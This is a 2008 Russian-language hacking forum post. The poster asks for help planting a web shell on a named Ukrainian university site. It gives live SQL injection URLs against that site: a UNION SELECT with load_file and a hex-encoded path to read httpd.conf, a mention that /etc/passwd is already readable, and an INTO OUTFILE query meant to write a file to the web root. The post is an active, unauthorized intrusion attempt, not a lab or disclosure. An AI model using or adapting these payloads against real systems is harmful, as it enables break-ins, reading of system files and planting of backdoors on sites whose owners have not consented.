
09.12.2008, 05:13
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме: 5386281
Репутация:
1177
|
|
Помогите залить шелл на предидущий пост))
Ковычки не фильтрует и дает читать /etc/passwd
http://kpi.ua/board/index.php?action=list_messages§ion_id=-1+union+select+load_file(0x2f6574632f6170616368653 22f68747470642e636f6e66)-- - содержание httpd.conf - вроде как тут должны буть всякие диры... или полный путь... но я не нашел((
http://kpi.ua/board/index.php?action=list_messages§ion_id=-1+union+select+'123'+from+mysql.user+into+outfile+ '/board/123.txt'-- - пробывал такой запрос - не получилось(( Видимо нужен полный путь, а я его никак найти не могу((
|
|
|